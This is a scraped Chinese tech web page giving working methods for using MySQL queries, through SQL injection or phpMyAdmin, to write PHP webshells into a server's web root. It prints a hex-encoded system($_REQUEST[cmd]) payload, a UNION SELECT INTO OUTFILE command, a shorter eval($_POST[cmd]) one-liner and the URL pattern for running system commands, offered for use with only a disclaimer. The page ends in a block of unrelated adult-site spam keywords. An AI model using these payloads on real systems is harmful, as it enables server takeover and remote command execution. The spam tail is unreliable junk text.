<span id="mktg5"></span>

<i id="mktg5"><meter id="mktg5"></meter></i>

        <label id="mktg5"><meter id="mktg5"></meter></label>
        最新文章專題視頻專題問答1問答10問答100問答1000問答2000關鍵字專題1關鍵字專題50關鍵字專題500關鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關鍵字專題關鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
        問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
        當前位置: 首頁 - 科技 - 知識百科 - 正文

        Mysql的語句生成后門木馬的方法

        來源:懂視網 責編:小采 時間:2020-11-09 21:01:06
        文檔

        Mysql的語句生成后門木馬的方法

        Mysql的語句生成后門木馬的方法:咳咳,大家看看就好了,本人不負責所產生的后果 代碼如下: SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes in
        推薦度:
        導讀Mysql的語句生成后門木馬的方法:咳咳,大家看看就好了,本人不負責所產生的后果 代碼如下: SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes in

        咳咳,大家看看就好了,本人不負責所產生的后果

        代碼如下:
        SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

        通過Mysql 的注入或者在 phpmyadmin 里運行以上語句,則會C:/inetpub/wwwroot/下生成 cmd.php 文件,內容為原來的 vbb_strikes 內容,后面緊跟著:2 3 <?php system($_REQUEST[cmd]);?>

        再通過 http://www.xxx.com/cmd.php?cmd=dir c: 就可以執行系統DOS命令!

        哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么東西?

        就是<?php system($_REQUEST[cmd]);?>的十六進制編碼了,如果不用這種方法,有不同的SQL版本會出現其它的編碼:如%xx之類的, 哪這個后門就不能執行的了!如果你有其它語名要弄,可以到UltraEdit里輸入,再按[Ctrl+H]鍵,將里面的十六進制連在一起就可以了!

         淺談MySQL導出一句話木馬拿WebShell的方法-只需要一句SQL

        昨天看一篇文章中說到MySQL導出一句話木馬拿WebShell的方法。
          文章中用到的SQL語句大體如下(命令行或者其它能執行SQL命令的shell都行):
          Drop TABLE IF EXISTS temp; //如果存在temp就刪掉
          Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一個cmd字段
          Insert INTO temp (cmd) VALUES(''); //把一句話木馬插入到temp表
          Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查詢temp表中的一句話并把結果導入到eval.php
          Drop TABLE IF EXISTS temp; //刪除temp(擦屁股o(∩_∩)o...)
          這幾句SQL很簡單,我做了簡單的注釋。
          不過想想我們在測試PHP的SQL漏洞的時候經常用如下的語句:
          /**/UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12/*
          然后返回的頁面中可能會出現1~12之間的數字。這里加入數字3顯示出來了。
          如果我們把上面這句改成/**/UNION SELECT 1,2,'zerosoul',4,5,6,7,8,9,10,11,12/*,則返回頁面上次顯示3的地方會顯示zerosoul。
          也就是說如果我們的select語句后面不帶from table語句的話,我們說查詢的數字或字符會直接返回到查詢結果里。
          既然這樣,我們為何還要那么麻煩去建一個表,先導入數據,再導出這樣折騰呢。
          有了這個思路,上面那一大段到出一句話的SQL代碼可以直接簡化到一句:
          
        Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';

          這樣做不但簡單明了,而且避免了誤刪別人的數據。以上所述就是本文的全部內容了,希望大家能夠喜歡。

        您可能感興趣的文章:

      1. mysql生成指定位數的隨機數及批量生成隨機數的方法
      2. Linux 下mysql通過存儲過程實現批量生成記錄
      3. mysql 動態生成測試數據
      4. mysql生成隨機字符串函數分享
      5. MySQL中隨機生成固定長度字符串的方法
      6. 在MySQL中生成隨機密碼的方法
      7. Mysql全局ID生成方法
      8. 如何批量生成MySQL不重復手機號大表實例代碼
      9. 聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

        文檔

        Mysql的語句生成后門木馬的方法

        Mysql的語句生成后門木馬的方法:咳咳,大家看看就好了,本人不負責所產生的后果 代碼如下: SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes in
        推薦度:
        標簽: 方法 的方法 木馬
        • 熱門焦點

        最新推薦

        猜你喜歡

        熱門推薦

        專題
        Top
        主站蜘蛛池模板: 精品在线观看免费| 精品亚洲AV无码一区二区| 日韩在线视频线视频免费网站| 好男人视频在线观看免费看片| 亚洲娇小性色xxxx| 100000免费啪啪18免进| 亚洲av乱码一区二区三区香蕉 | 亚洲国产精品美女| 91精品视频免费| 亚洲乱码日产精品一二三| 精品久久洲久久久久护士免费 | h在线看免费视频网站男男| 久久久久亚洲AV成人网人人网站| 91av免费在线视频| 久久精品国产亚洲av麻豆| 久久免费精彩视频| 亚洲va精品中文字幕| 女性无套免费网站在线看| 小说区亚洲自拍另类| 亚洲综合精品网站在线观看| a毛片在线还看免费网站| 亚洲视频在线免费观看| 免免费国产AAAAA片| 亚洲AV综合色区无码一二三区| jlzzjlzz亚洲乱熟在线播放| 97无码人妻福利免费公开在线视频| 久久精品亚洲一区二区三区浴池| 成人性生交大片免费看无遮挡| 国产亚洲精品美女2020久久| 亚洲另类激情综合偷自拍图| 四虎在线最新永久免费| 亚洲成av人无码亚洲成av人| 国产性爱在线观看亚洲黄色一级片| 99re这里有免费视频精品 | 国产精品美女久久久免费| 亚洲福利视频一区| 美女被免费视频网站a国产| 伊人免费在线观看| 亚洲一区二区三区乱码在线欧洲| 亚洲人成网站色在线入口| 久久久久久国产精品免费无码|